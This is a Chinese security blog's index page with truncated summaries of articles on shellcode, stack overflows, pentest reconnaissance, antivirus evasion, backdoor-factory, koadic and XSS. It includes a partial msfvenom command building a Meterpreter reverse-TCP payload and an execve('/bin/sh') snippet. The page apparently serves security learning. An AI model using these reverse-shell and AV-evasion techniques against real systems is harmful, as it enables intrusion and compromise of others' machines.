LYSHARK

摘要： Windows Driver Kit 是一种完全集成的驱动程序开发工具包，它包含 WinDDK 用于测试 Windows 驱动器的可靠性和稳定性，本次实验使用的是 WDK8.1 驱动开发工具包，该工具包支持 Windows 7到 Windows 10 系统的驱动开发。VS2013+WDK8.1 驱动开发环境的搭建我研究了很长时间今天总算搭建出来了，而且中途没有错误，这里就把搭建过程分享出来。 阅读全文

摘要： 反调试技术，恶意代码会用它识别自身是否被调试，或者让调试器失效，给反病毒工程师们制造麻烦，拉长提取特征码的时间线，本章将具体总结常见的反调试基础的实现原理以及如何过掉这些反调试手段，从而让我们能够继续分析恶意代码。 阅读全文

摘要： 栈溢出是缓冲区溢出中最为常见的一种攻击手法，其原理是，程序在运行时栈地址是由操作系统来负责维护的，在我们调用函数时，程序会将当前函数的下一条指令的地址压入栈中，而函数执行完毕后，则会通过ret指令从栈地址中弹出压入的返回地址，并将返回地址重新装载到EIP指令指针寄存器中，从而继续运行，然而将这种控制程序执行流程的地址保存到栈中，必然会给栈溢出攻击带来可行性。 阅读全文

摘要： `模糊测试(Fuzzing)`,是用于`漏洞挖掘`的探测工作,主要用于`发现`那些函数存在`漏洞`,通过向目标系统提供`非预期的输入`并监视异常结果来发现软件漏洞的方法,其原理主要是通过`输入`大量数据,发现程序中`存在的问题`.可以通过使程序某些内容溢出出现异常,或者输入的是程序规定的范围内的数据结果出现异常,从而找出程序的bug. 阅读全文

摘要： 1.使用C语言编写一个获得系统Shell的小程序。 #include <unistd.h> int main() { char * shell[2]; shell[0]="/bin/sh"; shell[1]=NULL; execve(shell[0],shell,NULL); } 编译并运行后，能 阅读全文

摘要： 在黑客圈子中，基于内存攻击技术的攻击手段在随着时代的变化而不断发展着，内存攻击是指通过利用软件的安全漏洞，构造恶意的输入，从而使正常程序造成拒绝服务或者是远程获得控制权，内存攻击技术中最先登上历史舞台的就是缓冲区溢出漏洞，时至今日能够被广泛利用的 60% 以上的高危漏洞（CVE）都属于缓冲区溢出，接下来我将总结缓冲区溢出的相关知识点。 阅读全文

摘要： 简易 ShellCode 虽然可以正常被执行，但是还存在很多的问题，因为上次所编写的 ShellCode 采用了硬编址的方式来调用相应API函数的，那么就会存在一个很大的缺陷，如果操作系统的版本不统一就会存在调用函数失败甚至是软件卡死的现象，下面我们通过编写一些定位程序，让 ShellCode 能够动态定位我们所需要的API函数地址，从而解决上节课中 ShellCode 的通用性问题。 阅读全文

摘要： ShellCode 通常是指一个原始的可执行代码的有效载荷，ShellCode 这个名字来源于攻击者通常会使用这段代码来获得被攻陷系统上的交互 Shell 的访问权限，而现在通常用于描述一段自包含的独立的可执行代码片段。 阅读全文

摘要： Linux是一套免费使用和自由传播的类Unix操作系统，作为一个开放源代码的操作系统，Linux服务器以其安全、高效和稳定的显著优势而得以广泛应用，但如果不做好权限的合理分配，Linux系统的安全性还是会得不到更好的保障，下面我们将主要使用RHEL7系统，分别从账户安全、登录控制，SeLinux配置等，优化Linux系统的安全性。 阅读全文

摘要： 信息收集（Information Gathering），信息收集是指通过各种方式获取所需要的信息，在整个渗透测试环节中，信息搜集是整个渗透过程中最为重要的一环，信息搜集可占据整个渗透测试80%左右的工作量，同样的如果尽可能搜集更多的信息，对于后期的渗透工作是非常有帮助的，本章将针对内网（域）环境进行信息的搜集工作，以作为学习笔记收录。 阅读全文

摘要： 信息收集（Information Gathering），信息收集是指通过各种方式获取所需要的信息，在整个渗透测试环节中，信息搜集是整个渗透过程中最为重要的一环，信息搜集可占据整个渗透测试80%左右的工作量，同样的如果尽可能搜集更多的信息，对于后期的渗透工作是非常有帮助的，本章将针对Web网站进行信息的搜集工作，以作为学习笔记收录。 阅读全文

摘要： Acunetix是全球排名前三的漏洞发现厂商，其全称（Acunetix Web Vulnerability Scanner）AWVS是业内领先的网络漏洞扫描器，其被广泛赞誉为包括最先进的SQL注入和XSS黑盒扫描技术。它能够自动爬行网站，并执行黑盒和灰盒测试技术，能够发现危险的漏洞。AWVS能够针对SQL注入、XSS、XXE、SSRF、主机头注入以及4500多个其他web漏洞执行精确的测试，并通过内置的Web管理页面轻松完成管理工作，同时能够生成非常完善的渗透报告。 阅读全文

摘要： Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能，并且与现有的WSH保持向后兼容，因此它的脚本程序不仅能访问.NET CLR，也能使用现有的COM技术，同时也包含了数种系统管理工具、简易且一致的语法，提升管理者的管理能力，自Windows 7 开始一直到Windows 10 包括服务器Windows Server 系统中，都将内置 PowerShell，其可作为白名单的一种绕过方式，也让渗透变得更加有趣。 阅读全文

摘要： 1.生成ShellCode [root@localhost ~]# msfvenom -a x86 --platform Windows \ > -p windows/meterpreter/reverse_tcp \ > -b '\x00\x0b' LHOST=192.168.1.30 LPORT 阅读全文

摘要： Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包（MSI）,一般在运行Microsoft Update安装更新或安装部分软件的时候出现，占用内存比较大。并且集成于Windows 7，Windows 10等，在Windows 10系统中无需配置环境变量就能直接被调用，非常的方便。 阅读全文

摘要： 社会工程学（Social Engineering）简称社工，其通过分析攻击对象的心理弱点，利用人性的本能反应，以及任何好奇心，贪婪等心理特征进行的，使用诸如假冒，欺骗，引诱等多种手段来达成攻击目标的一种手段，社会工程学的应用领域非常之广泛，而很多黑客也会将社工运用到渗透的方方面面，社工也被称为没有技术，却比技术更强大的渗透方式，正所谓 “攻城为下，攻心为上” 这句话用在社工上面是最恰当不过的啦。 阅读全文

摘要： slowhttptest 攻击是一款慢速攻击工具,其擅长攻击Apache/Tomcat这里应用层服务，通常情况下，http协议在接收到完整的客户端请求数据包时才会开始处理本次请求，但如果攻击者通过修改数据包中的Window窗口大小，实现慢速发送数据包，那么服务器就会始终为其保留连接池资源占用，此类大量的并发请求将会导致目标应用服务的连接池爆满，从而无法相应正常用的请求。 阅读全文

摘要： WMIC扩展WMI（Windows Management Instrumentation，Windows管理工具），提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前，如果要管理WMI系统，必须使用一些专门的WMI应用，例如SMS，或者使用WMI的脚本编程API，或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言，或者不掌握WMI名称空间的基本知识，要用WMI管理系统是很困难的。WMIC改变了这种情况。 阅读全文

摘要： koadic是DEFCON黑客大会上分享出来的的一个后渗透工具，虽然和msf有些相似，但是Koadic主要是通过使用Windows ScriptHost（也称为JScript / VBScript）进行大部分的操作，其核心兼容性支持WindowsXP到Window 10的环境中使用，Koadic的相比于其他的后门程序来说更轻便，该工具通过调用系统的一些命令来完成Shell的反弹工作，因为调用的是系统的模块，所以天生免杀。你只需要在目标主机上执行一条命令，即可完全控制目标主机。 阅读全文

摘要： backdoor-factory 顾名思义，直接翻译过来就是后门工厂的意思。其利用打补丁的方式编码加密PE文件，可以轻松的生成win32PE后门程序，从而帮助我们绕过一些防病毒软件的查杀，达到一定得免杀效果，利用该工具，攻击者可以在不破坏原有可执行文件的功能的前提下，在文件的代码裂隙中插入恶意代码Shellcode。当可执行文件被执行后，就可以触发恶意代码。Backdoor Factory不仅提供常用的脚本，还允许嵌入其他工具生成的Shellcode，如Metasploit。 阅读全文

摘要： 反病毒解决方案用于检测恶意文件，并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode)，那么依靠静态分析技术会非常有效，但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中，会发生什么？事实证明这样做可以绕过大多数杀软的查杀。 阅读全文

摘要： 渗透的本质是信息搜集，而要把信息搜集发挥最大效果，一定是离不开线索关联，而信息搜集，无论是对内，对外，更或者是主动信息搜集，被动信息搜集。如何把目标A与B的信息搜集，整理后做线索关联是一个非常有趣的工作。 阅读全文

摘要： 众所周知，目前的杀毒软件的杀毒原理主要有三种方式，一种基于特征，一种基于行为，一种基于云查杀，其中云查杀的一些特点基本上也可以概括为特征码查杀，不管是哪一种杀毒软件，都会检查PE文件头，尤其是当后门程序越大时，越容易被查杀。 阅读全文

摘要： XSS攻击是Web攻击中最常见的攻击手法之一，XSS中文名跨站脚本攻击，该攻击是指攻击者在网页中嵌入恶意的客户端脚本，通常是使用JS编写的恶意代码，当正常用户访问被嵌入代码的页面时，恶意代码将会在用户的浏览器上执行，所以XSS攻击主要时针对客户端的攻击手法。 阅读全文

摘要： Web应用程序通常会提供一些上传功能，比如上传头像，图片资源等，只要与资源传输有关的地方就可能存在上传漏洞，上传漏洞归根结底是程序员在对用户文件上传时控制不足或者是处理的缺陷导致的，文件上传漏洞在渗透测试中用的比较多，因为它是获取服务器WebShell最快最直接的攻击手法，其实文件上传本身并没有问题 阅读全文

摘要： RabbitMQ RabbitMQ是一个在AMQP基础上完整的,可复用的企业消息系统,他遵循Mozilla Public License开源协议,MQ全称为Message Queue,消息队列(MQ)是一种应用程序对应用程序的通信方法,应用程序通过读写出入队列的消息(针对应用程序的数据)来通信,而无 阅读全文

摘要： 网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息,资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等.网络编程是实现各类网络应用程序的基础,现在大部分的网络应用程序都基于Socket通信的,网络通信协议一共有两种,一种是基于`OSI的7层`参考模型,而另一种则是`TCP/IP协议的4层`通信模型,在我们开发环境中会使用TCP/IP作为通信基础,接下来将具体介绍两种通信协议模型. 阅读全文

摘要： 由于 Burp Suite是由Java语言编写而成，所以你需要首先安装JAVA的运行环境，而Java自身的跨平台性，使得软件几乎可以在任何平台上使用。Burp Suite不像其他的自动化测试工具，它需要你手工的去配置一些参数，触发一些自动化流程，然后它才会开始工作，接下来我们将手动配置好代理，然后暴 阅读全文

摘要： 漏洞分为系统漏洞和应用漏洞，系统漏洞以二进制漏洞为代表，其挖掘难度较高需要对反汇编和操作系统原理深入理解，而除了系统漏洞以外还有一些应用漏洞，包括不限MySQL，Apache，为代表的Web漏洞，这里我们就挖掘PHP代码层面的漏洞。 漏洞的挖掘也分为，点对点挖掘漏洞，和分散式挖掘漏洞，这我们主要使用 阅读全文

摘要： 线程是进程的执行单元,对于大多数程序来说,可能只有一个主线程,但是为了能够提高效率,有些程序会采用多线程,在系统中所有的线程看起来都是同时执行的,例如,现在的多线程网络下载程序中,就使用了这种线程并发的特性,程序将欲下载的文件分成多个部分,然后同时进行下载,从而加快速度.虽然线程并不是一个容易掌握和使用的概念,但是如果运用得当,还是可以获得很不错的性能的. 阅读全文